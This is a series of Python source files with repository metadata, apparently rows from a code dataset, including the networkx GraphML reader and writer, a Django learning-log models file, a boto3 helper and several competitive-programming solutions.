def theLoop(i): if i < 4: # Stops when false. # RECURSIVE CASE # The main code: print(i, 'Hello!') theLoop(i + 1) # Increment i. return else: # BASE CASE return theLoop(0) # Start i at 0.
83bf67157c94ca91dcfad4370e48441432eeff06
3de2a746243ad1cb000994a06a0f9699db9a901f
/abc083b.py
25f54f5c86bcc9984b5f3c4dbc00bddd018005eb
[]
no_license
takumi152/atcoder
71d726ffdf2542d8abac0d9817afaff911db7c6c
ebac94f1227974aa2e6bf372e18605518de46441
refs/heads/master
2022-10-30T12:14:41.742596
2022-09-29T19:49:32
2022-09-29T19:49:32
181,502,518
1
0
null
null
null
null
UTF-8
Python
false
false
386
py
def main(): buf = input() buflist = buf.split() N = int(buflist[0]) A = int(buflist[1]) B = int(buflist[2]) sum = 0 for i in range(1, N + 1): count = 0 for d in [int(d) for d in str(i)]: count += d if count >= A and count <= B: sum += i print(sum) if __name__ == '__main__': main()
ab4543f40cd972aedbc022fa7146b96e31d0acb6
853d4cec42071b76a80be38c58ffe0fbf9b9dc34
/venv/Lib/site-packages/networkx/readwrite/graphml.py
e732e75ebcf81e1438ca3a072c6ff5c70d2f61f3
[]
no_license
msainTesting/TwitterAnalysis
5e1646dbf40badf887a86e125ef30a9edaa622a4
b1204346508ba3e3922a52380ead5a8f7079726b
refs/heads/main
2023-08-28T08:29:28.924620
2021-11-04T12:36:30
2021-11-04T12:36:30
424,242,582
0
0
null
null
null
null
UTF-8
Python
false
false
35,908
py
""" ******* GraphML ******* Read and write graphs in GraphML format. This implementation does not support mixed graphs (directed and unidirected edges together), hyperedges, nested graphs, or ports. "GraphML is a comprehensive and easy-to-use file format for graphs. It consists of a language core to describe the structural properties of a graph and a flexible extension mechanism to add application-specific data. Its main features include support of * directed, undirected, and mixed graphs, * hypergraphs, * hierarchical graphs, * graphical representations, * references to external data, * application-specific attribute data, and * light-weight parsers. Unlike many other file formats for graphs, GraphML does not use a custom syntax. Instead, it is based on XML and hence ideally suited as a common denominator for all kinds of services generating, archiving, or processing graphs." http://graphml.graphdrawing.org/ Format ------ GraphML is an XML format. See http://graphml.graphdrawing.org/specification.html for the specification and http://graphml.graphdrawing.org/primer/graphml-primer.html for examples. """ import warnings from collections import defaultdict from xml.etree.ElementTree import Element, ElementTree, tostring, fromstring try: import lxml.etree as lxmletree except ImportError: lxmletree = None import networkx as nx from networkx.utils import open_file __all__ = [ "write_graphml", "read_graphml", "generate_graphml", "write_graphml_xml", "write_graphml_lxml", "parse_graphml", "GraphMLWriter", "GraphMLReader", ] @open_file(1, mode="wb") def write_graphml_xml( G, path, encoding="utf-8", prettyprint=True, infer_numeric_types=False, named_key_ids=False, ): """Write G in GraphML XML format to path Parameters ---------- G : graph A networkx graph path : file or string File or filename to write. Filenames ending in .gz or .bz2 will be compressed. encoding : string (optional) Encoding for text data. prettyprint : bool (optional) If True use line breaks and indenting in output XML. infer_numeric_types : boolean Determine if numeric types should be generalized. For example, if edges have both int and float 'weight' attributes, we infer in GraphML that both are floats. named_key_ids : bool (optional) If True use attr.name as value for key elements' id attribute. Examples -------- >>> G = nx.path_graph(4) >>> nx.write_graphml(G, "test.graphml") Notes ----- This implementation does not support mixed graphs (directed and unidirected edges together) hyperedges, nested graphs, or ports. """ writer = GraphMLWriter( encoding=encoding, prettyprint=prettyprint, infer_numeric_types=infer_numeric_types, named_key_ids=named_key_ids, ) writer.add_graph_element(G) writer.dump(path) @open_file(1, mode="wb") def write_graphml_lxml( G, path, encoding="utf-8", prettyprint=True, infer_numeric_types=False, named_key_ids=False, ): """Write G in GraphML XML format to path This function uses the LXML framework and should be faster than the version using the xml library. Parameters ---------- G : graph A networkx graph path : file or string File or filename to write. Filenames ending in .gz or .bz2 will be compressed. encoding : string (optional) Encoding for text data. prettyprint : bool (optional) If True use line breaks and indenting in output XML. infer_numeric_types : boolean Determine if numeric types should be generalized. For example, if edges have both int and float 'weight' attributes, we infer in GraphML that both are floats. named_key_ids : bool (optional) If True use attr.name as value for key elements' id attribute. Examples -------- >>> G = nx.path_graph(4) >>> nx.write_graphml_lxml(G, "fourpath.graphml") # doctest: +SKIP Notes ----- This implementation does not support mixed graphs (directed and unidirected edges together) hyperedges, nested graphs, or ports. """ writer = GraphMLWriterLxml( path, graph=G, encoding=encoding, prettyprint=prettyprint, infer_numeric_types=infer_numeric_types, named_key_ids=named_key_ids, ) writer.dump() def generate_graphml(G, encoding="utf-8", prettyprint=True, named_key_ids=False): """Generate GraphML lines for G Parameters ---------- G : graph A networkx graph encoding : string (optional) Encoding for text data. prettyprint : bool (optional) If True use line breaks and indenting in output XML. named_key_ids : bool (optional) If True use attr.name as value for key elements' id attribute. Examples -------- >>> G = nx.path_graph(4) >>> linefeed = chr(10) # linefeed = \n >>> s = linefeed.join(nx.generate_graphml(G)) # doctest: +SKIP >>> for line in nx.generate_graphml(G): # doctest: +SKIP ... print(line) Notes ----- This implementation does not support mixed graphs (directed and unidirected edges together) hyperedges, nested graphs, or ports. """ writer = GraphMLWriter( encoding=encoding, prettyprint=prettyprint, named_key_ids=named_key_ids ) writer.add_graph_element(G) yield from str(writer).splitlines() @open_file(0, mode="rb") def read_graphml(path, node_type=str, edge_key_type=int, force_multigraph=False): """Read graph in GraphML format from path. Parameters ---------- path : file or string File or filename to write. Filenames ending in .gz or .bz2 will be compressed. node_type: Python type (default: str) Convert node ids to this type edge_key_type: Python type (default: int) Convert graphml edge ids to this type. Multigraphs use id as edge key. Non-multigraphs add to edge attribute dict with name "id". force_multigraph : bool (default: False) If True, return a multigraph with edge keys. If False (the default) return a multigraph when multiedges are in the graph. Returns ------- graph: NetworkX graph If parallel edges are present or `force_multigraph=True` then a MultiGraph or MultiDiGraph is returned. Otherwise a Graph/DiGraph. The returned graph is directed if the file indicates it should be. Notes ----- Default node and edge attributes are not propagated to each node and edge. They can be obtained from `G.graph` and applied to node and edge attributes if desired using something like this: >>> default_color = G.graph["node_default"]["color"] # doctest: +SKIP >>> for node, data in G.nodes(data=True): # doctest: +SKIP ... if "color" not in data: ... data["color"] = default_color >>> default_color = G.graph["edge_default"]["color"] # doctest: +SKIP >>> for u, v, data in G.edges(data=True): # doctest: +SKIP ... if "color" not in data: ... data["color"] = default_color This implementation does not support mixed graphs (directed and unidirected edges together), hypergraphs, nested graphs, or ports. For multigraphs the GraphML edge "id" will be used as the edge key. If not specified then they "key" attribute will be used. If there is no "key" attribute a default NetworkX multigraph edge key will be provided. Files with the yEd "yfiles" extension will can be read but the graphics information is discarded. yEd compressed files ("file.graphmlz" extension) can be read by renaming the file to "file.graphml.gz". """ reader = GraphMLReader(node_type, edge_key_type, force_multigraph) # need to check for multiple graphs glist = list(reader(path=path)) if len(glist) == 0: # If no graph comes back, try looking for an incomplete header header = b'<graphml xmlns="http://graphml.graphdrawing.org/xmlns">' path.seek(0) old_bytes = path.read() new_bytes = old_bytes.replace(b"<graphml>", header) glist = list(reader(string=new_bytes)) if len(glist) == 0: raise nx.NetworkXError("file not successfully read as graphml") return glist[0] def parse_graphml( graphml_string, node_type=str, edge_key_type=int, force_multigraph=False ): """Read graph in GraphML format from string. Parameters ---------- graphml_string : string String containing graphml information (e.g., contents of a graphml file). node_type: Python type (default: str) Convert node ids to this type edge_key_type: Python type (default: int) Convert graphml edge ids to this type. Multigraphs use id as edge key. Non-multigraphs add to edge attribute dict with name "id". force_multigraph : bool (default: False) If True, return a multigraph with edge keys. If False (the default) return a multigraph when multiedges are in the graph. Returns ------- graph: NetworkX graph If no parallel edges are found a Graph or DiGraph is returned. Otherwise a MultiGraph or MultiDiGraph is returned. Examples -------- >>> G = nx.path_graph(4) >>> linefeed = chr(10) # linefeed = \n >>> s = linefeed.join(nx.generate_graphml(G)) >>> H = nx.parse_graphml(s) Notes ----- Default node and edge attributes are not propagated to each node and edge. They can be obtained from `G.graph` and applied to node and edge attributes if desired using something like this: >>> default_color = G.graph["node_default"]["color"] # doctest: +SKIP >>> for node, data in G.nodes(data=True): # doctest: +SKIP ... if "color" not in data: ... data["color"] = default_color >>> default_color = G.graph["edge_default"]["color"] # doctest: +SKIP >>> for u, v, data in G.edges(data=True): # doctest: +SKIP ... if "color" not in data: ... data["color"] = default_color This implementation does not support mixed graphs (directed and unidirected edges together), hypergraphs, nested graphs, or ports. For multigraphs the GraphML edge "id" will be used as the edge key. If not specified then they "key" attribute will be used. If there is no "key" attribute a default NetworkX multigraph edge key will be provided. """ reader = GraphMLReader(node_type, edge_key_type, force_multigraph) # need to check for multiple graphs glist = list(reader(string=graphml_string)) if len(glist) == 0: # If no graph comes back, try looking for an incomplete header header = '<graphml xmlns="http://graphml.graphdrawing.org/xmlns">' new_string = graphml_string.replace("<graphml>", header) glist = list(reader(string=new_string)) if len(glist) == 0: raise nx.NetworkXError("file not successfully read as graphml") return glist[0] class GraphML: NS_GRAPHML = "http://graphml.graphdrawing.org/xmlns" NS_XSI = "http://www.w3.org/2001/XMLSchema-instance" # xmlns:y="http://www.yworks.com/xml/graphml" NS_Y = "http://www.yworks.com/xml/graphml" SCHEMALOCATION = " ".join( [ "http://graphml.graphdrawing.org/xmlns", "http://graphml.graphdrawing.org/xmlns/1.0/graphml.xsd", ] ) types = [ (int, "integer"), # for Gephi GraphML bug (str, "yfiles"), (str, "string"), (int, "int"), (float, "float"), (float, "double"), (bool, "boolean"), ] # These additions to types allow writing numpy types try: import numpy as np except: pass else: # prepend so that python types are created upon read (last entry wins) types = [ (np.float64, "float"), (np.float32, "float"), (np.float16, "float"), (np.float_, "float"), (np.int_, "int"), (np.int8, "int"), (np.int16, "int"), (np.int32, "int"), (np.int64, "int"), (np.uint8, "int"), (np.uint16, "int"), (np.uint32, "int"), (np.uint64, "int"), (np.int_, "int"), (np.intc, "int"), (np.intp, "int"), ] + types xml_type = dict(types) python_type = dict(reversed(a) for a in types) # This page says that data types in GraphML follow Java(TM). # http://graphml.graphdrawing.org/primer/graphml-primer.html#AttributesDefinition # true and false are the only boolean literals: # http://en.wikibooks.org/wiki/Java_Programming/Literals#Boolean_Literals convert_bool = { # We use data.lower() in actual use. "true": True, "false": False, # Include integer strings for convenience. "0": False, 0: False, "1": True, 1: True, } class GraphMLWriter(GraphML): def __init__( self, graph=None, encoding="utf-8", prettyprint=True, infer_numeric_types=False, named_key_ids=False, ): self.myElement = Element self.infer_numeric_types = infer_numeric_types self.prettyprint = prettyprint self.named_key_ids = named_key_ids self.encoding = encoding self.xml = self.myElement( "graphml", { "xmlns": self.NS_GRAPHML, "xmlns:xsi": self.NS_XSI, "xsi:schemaLocation": self.SCHEMALOCATION, }, ) self.keys = {} self.attributes = defaultdict(list) self.attribute_types = defaultdict(set) if graph is not None: self.add_graph_element(graph) def __str__(self): if self.prettyprint: self.indent(self.xml) s = tostring(self.xml).decode(self.encoding) return s def attr_type(self, name, scope, value): """Infer the attribute type of data named name. Currently this only supports inference of numeric types. If self.infer_numeric_types is false, type is used. Otherwise, pick the most general of types found across all values with name and scope. This means edges with data named 'weight' are treated separately from nodes with data named 'weight'. """ if self.infer_numeric_types: types = self.attribute_types[(name, scope)] if len(types) > 1: types = {self.xml_type[t] for t in types} if "string" in types: return str elif "float" in types or "double" in types: return float else: return int else: return list(types)[0] else: return type(value) def get_key(self, name, attr_type, scope, default): keys_key = (name, attr_type, scope) try: return self.keys[keys_key] except KeyError: if self.named_key_ids: new_id = name else: new_id = f"d{len(list(self.keys))}" self.keys[keys_key] = new_id key_kwargs = { "id": new_id, "for": scope, "attr.name": name, "attr.type": attr_type, } key_element = self.myElement("key", **key_kwargs) # add subelement for data default value if present if default is not None: default_element = self.myElement("default") default_element.text = str(default) key_element.append(default_element) self.xml.insert(0, key_element) return new_id def add_data(self, name, element_type, value, scope="all", default=None): """ Make a data element for an edge or a node. Keep a log of the type in the keys table. """ if element_type not in self.xml_type: msg = f"GraphML writer does not support {element_type} as data values." raise nx.NetworkXError(msg) keyid = self.get_key(name, self.xml_type[element_type], scope, default) data_element = self.myElement("data", key=keyid) data_element.text = str(value) return data_element def add_attributes(self, scope, xml_obj, data, default): """Appends attribute data to edges or nodes, and stores type information to be added later. See add_graph_element. """ for k, v in data.items(): self.attribute_types[(str(k), scope)].add(type(v)) self.attributes[xml_obj].append([k, v, scope, default.get(k)]) def add_nodes(self, G, graph_element): default = G.graph.get("node_default", {}) for node, data in G.nodes(data=True): node_element = self.myElement("node", id=str(node)) self.add_attributes("node", node_element, data, default) graph_element.append(node_element) def add_edges(self, G, graph_element): if G.is_multigraph(): for u, v, key, data in G.edges(data=True, keys=True): edge_element = self.myElement( "edge", source=str(u), target=str(v), id=str(key) ) default = G.graph.get("edge_default", {}) self.add_attributes("edge", edge_element, data, default) graph_element.append(edge_element) else: for u, v, data in G.edges(data=True): edge_element = self.myElement("edge", source=str(u), target=str(v)) default = G.graph.get("edge_default", {}) self.add_attributes("edge", edge_element, data, default) graph_element.append(edge_element) def add_graph_element(self, G): """ Serialize graph G in GraphML to the stream. """ if G.is_directed(): default_edge_type = "directed" else: default_edge_type = "undirected" graphid = G.graph.pop("id", None) if graphid is None: graph_element = self.myElement("graph", edgedefault=default_edge_type) else: graph_element = self.myElement( "graph", edgedefault=default_edge_type, id=graphid ) default = {} data = { k: v for (k, v) in G.graph.items() if k not in ["node_default", "edge_default"] } self.add_attributes("graph", graph_element, data, default) self.add_nodes(G, graph_element) self.add_edges(G, graph_element) # self.attributes contains a mapping from XML Objects to a list of # data that needs to be added to them. # We postpone processing in order to do type inference/generalization. # See self.attr_type for (xml_obj, data) in self.attributes.items(): for (k, v, scope, default) in data: xml_obj.append( self.add_data( str(k), self.attr_type(k, scope, v), str(v), scope, default ) ) self.xml.append(graph_element) def add_graphs(self, graph_list): """ Add many graphs to this GraphML document. """ for G in graph_list: self.add_graph_element(G) def dump(self, stream): if self.prettyprint: self.indent(self.xml) document = ElementTree(self.xml) document.write(stream, encoding=self.encoding, xml_declaration=True) def indent(self, elem, level=0): # in-place prettyprint formatter i = "\n" + level * " " if len(elem): if not elem.text or not elem.text.strip(): elem.text = i + " " if not elem.tail or not elem.tail.strip(): elem.tail = i for elem in elem: self.indent(elem, level + 1) if not elem.tail or not elem.tail.strip(): elem.tail = i else: if level and (not elem.tail or not elem.tail.strip()): elem.tail = i class IncrementalElement: """Wrapper for _IncrementalWriter providing an Element like interface. This wrapper does not intend to be a complete implementation but rather to deal with those calls used in GraphMLWriter. """ def __init__(self, xml, prettyprint): self.xml = xml self.prettyprint = prettyprint def append(self, element): self.xml.write(element, pretty_print=self.prettyprint) class GraphMLWriterLxml(GraphMLWriter): def __init__( self, path, graph=None, encoding="utf-8", prettyprint=True, infer_numeric_types=False, named_key_ids=False, ): self.myElement = lxmletree.Element self._encoding = encoding self._prettyprint = prettyprint self.named_key_ids = named_key_ids self.infer_numeric_types = infer_numeric_types self._xml_base = lxmletree.xmlfile(path, encoding=encoding) self._xml = self._xml_base.__enter__() self._xml.write_declaration() # We need to have a xml variable that support insertion. This call is # used for adding the keys to the document. # We will store those keys in a plain list, and then after the graph # element is closed we will add them to the main graphml element. self.xml = [] self._keys = self.xml self._graphml = self._xml.element( "graphml", { "xmlns": self.NS_GRAPHML, "xmlns:xsi": self.NS_XSI, "xsi:schemaLocation": self.SCHEMALOCATION, }, ) self._graphml.__enter__() self.keys = {} self.attribute_types = defaultdict(set) if graph is not None: self.add_graph_element(graph) def add_graph_element(self, G): """ Serialize graph G in GraphML to the stream. """ if G.is_directed(): default_edge_type = "directed" else: default_edge_type = "undirected" graphid = G.graph.pop("id", None) if graphid is None: graph_element = self._xml.element("graph", edgedefault=default_edge_type) else: graph_element = self._xml.element( "graph", edgedefault=default_edge_type, id=graphid ) # gather attributes types for the whole graph # to find the most general numeric format needed. # Then pass through attributes to create key_id for each. graphdata = { k: v for k, v in G.graph.items() if k not in ("node_default", "edge_default") } node_default = G.graph.get("node_default", {}) edge_default = G.graph.get("edge_default", {}) # Graph attributes for k, v in graphdata.items(): self.attribute_types[(str(k), "graph")].add(type(v)) for k, v in graphdata.items(): element_type = self.xml_type[self.attr_type(k, "graph", v)] self.get_key(str(k), element_type, "graph", None) # Nodes and data for node, d in G.nodes(data=True): for k, v in d.items(): self.attribute_types[(str(k), "node")].add(type(v)) for node, d in G.nodes(data=True): for k, v in d.items(): T = self.xml_type[self.attr_type(k, "node", v)] self.get_key(str(k), T, "node", node_default.get(k)) # Edges and data if G.is_multigraph(): for u, v, ekey, d in G.edges(keys=True, data=True): for k, v in d.items(): self.attribute_types[(str(k), "edge")].add(type(v)) for u, v, ekey, d in G.edges(keys=True, data=True): for k, v in d.items(): T = self.xml_type[self.attr_type(k, "edge", v)] self.get_key(str(k), T, "edge", edge_default.get(k)) else: for u, v, d in G.edges(data=True): for k, v in d.items(): self.attribute_types[(str(k), "edge")].add(type(v)) for u, v, d in G.edges(data=True): for k, v in d.items(): T = self.xml_type[self.attr_type(k, "edge", v)] self.get_key(str(k), T, "edge", edge_default.get(k)) # Now add attribute keys to the xml file for key in self.xml: self._xml.write(key, pretty_print=self._prettyprint) # The incremental_writer writes each node/edge as it is created incremental_writer = IncrementalElement(self._xml, self._prettyprint) with graph_element: self.add_attributes("graph", incremental_writer, graphdata, {}) self.add_nodes(G, incremental_writer) # adds attributes too self.add_edges(G, incremental_writer) # adds attributes too def add_attributes(self, scope, xml_obj, data, default): """Appends attribute data.""" for k, v in data.items(): data_element = self.add_data( str(k), self.attr_type(str(k), scope, v), str(v), scope, default.get(k) ) xml_obj.append(data_element) def __str__(self): return object.__str__(self) def dump(self): self._graphml.__exit__(None, None, None) self._xml_base.__exit__(None, None, None) # Choose a writer function for default if lxmletree is None: write_graphml = write_graphml_xml else: write_graphml = write_graphml_lxml class GraphMLReader(GraphML): """Read a GraphML document. Produces NetworkX graph objects.""" def __init__(self, node_type=str, edge_key_type=int, force_multigraph=False): self.node_type = node_type self.edge_key_type = edge_key_type self.multigraph = force_multigraph # If False, test for multiedges self.edge_ids = {} # dict mapping (u,v) tuples to edge id attributes def __call__(self, path=None, string=None): if path is not None: self.xml = ElementTree(file=path) elif string is not None: self.xml = fromstring(string) else: raise ValueError("Must specify either 'path' or 'string' as kwarg") (keys, defaults) = self.find_graphml_keys(self.xml) for g in self.xml.findall(f"{{{self.NS_GRAPHML}}}graph"): yield self.make_graph(g, keys, defaults) def make_graph(self, graph_xml, graphml_keys, defaults, G=None): # set default graph type edgedefault = graph_xml.get("edgedefault", None) if G is None: if edgedefault == "directed": G = nx.MultiDiGraph() else: G = nx.MultiGraph() # set defaults for graph attributes G.graph["node_default"] = {} G.graph["edge_default"] = {} for key_id, value in defaults.items(): key_for = graphml_keys[key_id]["for"] name = graphml_keys[key_id]["name"] python_type = graphml_keys[key_id]["type"] if key_for == "node": G.graph["node_default"].update({name: python_type(value)}) if key_for == "edge": G.graph["edge_default"].update({name: python_type(value)}) # hyperedges are not supported hyperedge = graph_xml.find(f"{{{self.NS_GRAPHML}}}hyperedge") if hyperedge is not None: raise nx.NetworkXError("GraphML reader doesn't support hyperedges") # add nodes for node_xml in graph_xml.findall(f"{{{self.NS_GRAPHML}}}node"): self.add_node(G, node_xml, graphml_keys, defaults) # add edges for edge_xml in graph_xml.findall(f"{{{self.NS_GRAPHML}}}edge"): self.add_edge(G, edge_xml, graphml_keys) # add graph data data = self.decode_data_elements(graphml_keys, graph_xml) G.graph.update(data) # switch to Graph or DiGraph if no parallel edges were found if self.multigraph: return G G = nx.DiGraph(G) if G.is_directed() else nx.Graph(G) # add explicit edge "id" from file as attribute in NX graph. nx.set_edge_attributes(G, values=self.edge_ids, name="id") return G def add_node(self, G, node_xml, graphml_keys, defaults): """Add a node to the graph. """ # warn on finding unsupported ports tag ports = node_xml.find(f"{{{self.NS_GRAPHML}}}port") if ports is not None: warnings.warn("GraphML port tag not supported.") # find the node by id and cast it to the appropriate type node_id = self.node_type(node_xml.get("id")) # get data/attributes for node data = self.decode_data_elements(graphml_keys, node_xml) G.add_node(node_id, **data) # get child nodes if node_xml.attrib.get("yfiles.foldertype") == "group": graph_xml = node_xml.find(f"{{{self.NS_GRAPHML}}}graph") self.make_graph(graph_xml, graphml_keys, defaults, G) def add_edge(self, G, edge_element, graphml_keys): """Add an edge to the graph. """ # warn on finding unsupported ports tag ports = edge_element.find(f"{{{self.NS_GRAPHML}}}port") if ports is not None: warnings.warn("GraphML port tag not supported.") # raise error if we find mixed directed and undirected edges directed = edge_element.get("directed") if G.is_directed() and directed == "false": msg = "directed=false edge found in directed graph." raise nx.NetworkXError(msg) if (not G.is_directed()) and directed == "true": msg = "directed=true edge found in undirected graph." raise nx.NetworkXError(msg) source = self.node_type(edge_element.get("source")) target = self.node_type(edge_element.get("target")) data = self.decode_data_elements(graphml_keys, edge_element) # GraphML stores edge ids as an attribute # NetworkX uses them as keys in multigraphs too if no key # attribute is specified edge_id = edge_element.get("id") if edge_id: # self.edge_ids is used by `make_graph` method for non-multigraphs self.edge_ids[source, target] = edge_id try: edge_id = self.edge_key_type(edge_id) except ValueError: # Could not convert. pass else: edge_id = data.get("key") if G.has_edge(source, target): # mark this as a multigraph self.multigraph = True # Use add_edges_from to avoid error with add_edge when `'key' in data` # Note there is only one edge here... G.add_edges_from([(source, target, edge_id, data)]) def decode_data_elements(self, graphml_keys, obj_xml): """Use the key information to decode the data XML if present.""" data = {} for data_element in obj_xml.findall(f"{{{self.NS_GRAPHML}}}data"): key = data_element.get("key") try: data_name = graphml_keys[key]["name"] data_type = graphml_keys[key]["type"] except KeyError as e: raise nx.NetworkXError(f"Bad GraphML data: no key {key}") from e text = data_element.text # assume anything with subelements is a yfiles extension if text is not None and len(list(data_element)) == 0: if data_type == bool: # Ignore cases. # http://docs.oracle.com/javase/6/docs/api/java/lang/ # Boolean.html#parseBoolean%28java.lang.String%29 data[data_name] = self.convert_bool[text.lower()] else: data[data_name] = data_type(text) elif len(list(data_element)) > 0: # Assume yfiles as subelements, try to extract node_label node_label = None for node_type in ["ShapeNode", "SVGNode", "ImageNode"]: pref = f"{{{self.NS_Y}}}{node_type}/{{{self.NS_Y}}}" geometry = data_element.find(f"{pref}Geometry") if geometry is not None: data["x"] = geometry.get("x") data["y"] = geometry.get("y") if node_label is None: node_label = data_element.find(f"{pref}NodeLabel") if node_label is not None: data["label"] = node_label.text # check all the different types of edges avaivable in yEd. for e in [ "PolyLineEdge", "SplineEdge", "QuadCurveEdge", "BezierEdge", "ArcEdge", ]: pref = f"{{{self.NS_Y}}}{e}/{{{self.NS_Y}}}" edge_label = data_element.find(f"{pref}EdgeLabel") if edge_label is not None: break if edge_label is not None: data["label"] = edge_label.text return data def find_graphml_keys(self, graph_element): """Extracts all the keys and key defaults from the xml. """ graphml_keys = {} graphml_key_defaults = {} for k in graph_element.findall(f"{{{self.NS_GRAPHML}}}key"): attr_id = k.get("id") attr_type = k.get("attr.type") attr_name = k.get("attr.name") yfiles_type = k.get("yfiles.type") if yfiles_type is not None: attr_name = yfiles_type attr_type = "yfiles" if attr_type is None: attr_type = "string" warnings.warn(f"No key type for id {attr_id}. Using string") if attr_name is None: raise nx.NetworkXError(f"Unknown key for id {attr_id}.") graphml_keys[attr_id] = { "name": attr_name, "type": self.python_type[attr_type], "for": k.get("for"), } # check for "default" subelement of key element default = k.find(f"{{{self.NS_GRAPHML}}}default") if default is not None: graphml_key_defaults[attr_id] = default.text return graphml_keys, graphml_key_defaults
0442dccb71f8076d97bd44918f3116cd9633224c
75fe89a5ca7ceb91757199c4dde6fd20a69c94b9
/pygmsh/circle_arc.py
527ec58c5c88de3903e536d467a0c54bbda050b0
[ "MIT" ]
permissive
guifon1000/pygmsh
39d1c1d3e890f64afa94e35e6da4e0c6967d3373
ce6bf8f080c359b1ab81c9d1adee6a81d3419d51
refs/heads/master
2021-01-22T23:53:42.835887
2017-03-20T13:45:53
2017-03-20T13:45:53
null
0
0
null
null
null
null
UTF-8
Python
false
false
488
py
# -*- coding: utf-8 -*- # from .line_base import LineBase from .point import Point class CircleArc(LineBase): def __init__(self, points): super(CircleArc, self).__init__() for p in points: assert isinstance(p, Point) self.points = points self.code = '\n'.join([ '%s = newl;' % self.id, 'Circle(%s) = {%s, %s, %s};' % (self.id, points[0].id, points[1].id, points[2].id) ]) return
229da8f1da7b2924a17df7c56df8eef9f31d5ee1
bc0d87befa0329c50c2e57ead730050b648e15c6
/leaning_logs/models.py
48d76ed238355d3f04b39298a65d73a02204d8a6
[]
no_license
YGragon/DjangoLearningLogs
85a0598849600536cdbf45cfb9444f36dfd31c57
e3228aed7aa181d657b9aa58d93e9d37f09d918d
refs/heads/master
2021-09-10T19:36:52.924500
2018-04-01T00:11:13
2018-04-01T00:11:13
null
0
0
null
null
null
null
UTF-8
Python
false
false
1,676
py
from django.db import models from django.contrib.auth.models import User import json from datetime import date, datetime class Topic(models.Model): """用户要学习的主题.""" text = models.CharField(max_length=200) date_added = models.DateTimeField(auto_now_add=True) # 外键是用户,可以通过这个外键确定这个主题属于哪个用户 owner = models.ForeignKey(User, "on_delete=models.CASCADE") def __str__(self): """返回模型的字符串表示""" return self.text class Entry(models.Model): """用户发表的文章""" # 外键是主题,可以通过这个外键确定这个文章属于哪个主题 topic = models.ForeignKey(Topic, "on_delete=models.CASCADE") text = models.TextField() date_added = models.DateTimeField(auto_now_add = True) class Meta: verbose_name_plural = 'entries' def __str__(self): """返回模型的字符串表示""" return self.text[:50] + "..." class MyEncoder(json.JSONEncoder): def default(self, obj): if isinstance(obj, datetime): return obj.strftime('%Y-%m-%d %H:%M:%S') elif isinstance(obj, date): return obj.strftime("%Y-%m-%d") else: return json.JSONEncoder.default(self, obj) class TopicEncoder(json.JSONEncoder): def default(self, obj): if isinstance(obj, Topic): return obj.text return json.JSONEncoder.default(self, obj) class EntryEncoder(json.JSONEncoder): def default(self, obj): if isinstance(obj, Entry): return obj.text else: return json.JSONEncoder.default(self, obj)
ca87266c74882e0db39d481e2bf5488941ec7f3e
61e4cb5f60541939e122714aa085f2028a7904c5
/duckdown/tool/provision/utils.py
90d0b5cfc9e95d9eee414dbe564ed3dae2034188
[ "MIT" ]
permissive
blueshed/duckdown
1a07bf541a5849000d9e8622622cc67a3bec933f
e6d0e62d378bd2d9ed0cd5ce4bc7ab3476b86020
refs/heads/master
2023-01-30T12:18:05.713016
2020-12-08T20:38:36
2020-12-08T20:38:36
314,370,191
0
0
MIT
2020-12-08T14:54:11
2020-11-19T21:06:47
Python
UTF-8
Python
false
false
711
py
""" utils """ import boto3 from pkg_resources import resource_filename def get_bucket_arn(bucket_name, region="", account_id=""): """ We need the arn of a queue """ bucket_arn = f"arn:aws:s3:{region}:{account_id}:{bucket_name}" return bucket_arn def get_aws_region_account(): """ Return the aws region and account_id """ session = boto3.Session() region = session.region_name sts = session.client("sts") response = sts.get_caller_identity() return region, response["Account"] def get_resource(name): """ return resource content """ path = resource_filename("duckdown.tool.provision", f"resources/{name}") with open(path) as file: return file.read()
7190f1bfb7ef37d25eff124ec59c652fd6d5cdf5
ca7aa979e7059467e158830b76673f5b77a0f5a3
/Python_codes/p02947/s893966605.py
67b744e4b961123394465b52cb99e7a525a91c56
[]
no_license
Aasthaengg/IBMdataset
7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901
f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8
refs/heads/main
2023-04-22T10:22:44.763102
2021-05-13T17:27:22
2021-05-13T17:27:22
367,112,348
0
0
null
null
null
null
UTF-8
Python
false
false
667
py
from collections import defaultdict from collections import deque from collections import Counter import itertools import math def readInt(): return int(input()) def readInts(): return list(map(int, input().split())) def readChar(): return input() def readChars(): return input().split() def comb(n,r): return math.factorial(n)//math.factorial(r)//math.factorial(max(1,n-r)) def con(t): ans = "" for i in t: ans+=i[0]+str(i[1]) return ans n = readInt() d = defaultdict(int) for i in [input() for i in range(n)]: t = defaultdict(int) for j in i: t[j]+=1 d[con(sorted(t.items()))]+=1 ans = 0 for i in d: ans+=comb(d[i],2) print(ans)
6671affb60476364415d4f792368ccdf01def877
0a949a1774607543de2dd5edf3a7efbbed3744c5
/Day 25 power of 2.py
498bb09544dee2f1fa49029e65f9e1572b050b82
[]
no_license
AprajitaChhawi/365DaysOfCode.MARCH
ac46631665e508372b3ad6c9d57c89906f657f3d
dc1f70339491eb3ee194c62e1ded28695097d166
refs/heads/main
2023-03-28T12:34:56.499942
2021-04-01T17:45:22
2021-04-01T17:45:22
343,509,704
1
0
null
null
null
null
UTF-8
Python
false
false
697
py
#User function Template for python3 class Solution: ##Complete this function # Function to check if given number n is a power of two. def isPowerofTwo(self,n): co=0 while(n>0): n=n&(n-1) co=co+1 if(co==1): return 1 return 0 ##Your code here #{ # Driver Code Starts #Initial Template for Python 3 import math def main(): T=int(input()) while(T>0): n=int(input()) ob=Solution() if ob.isPowerofTwo(n): print("YES") else: print("NO") T-=1 if __name__=="__main__": main() # } Driver Code Ends
9dcec2f68efa859cd5ef76a564687c9193dc6fd4
80b7f2a10506f70477d8720e229d7530da2eff5d
/ixnetwork_restpy/testplatform/sessions/ixnetwork/vport/protocolstack/dhcphostsoptions_191fedb8ef50cd521c12d7ded5cc3bc5.py
3b4eeaaa7619f809955d955aec4990941c12f30d
[ "MIT" ]
permissive
OpenIxia/ixnetwork_restpy
00fdc305901aa7e4b26e4000b133655e2d0e346a
c8ecc779421bffbc27c906c1ea51af3756d83398
refs/heads/master
2023-08-10T02:21:38.207252
2023-07-19T14:14:57
2023-07-19T14:14:57
174,170,555
26
16
MIT
2023-02-02T07:02:43
2019-03-06T15:27:20
Python
UTF-8
Python
false
false
8,259
py
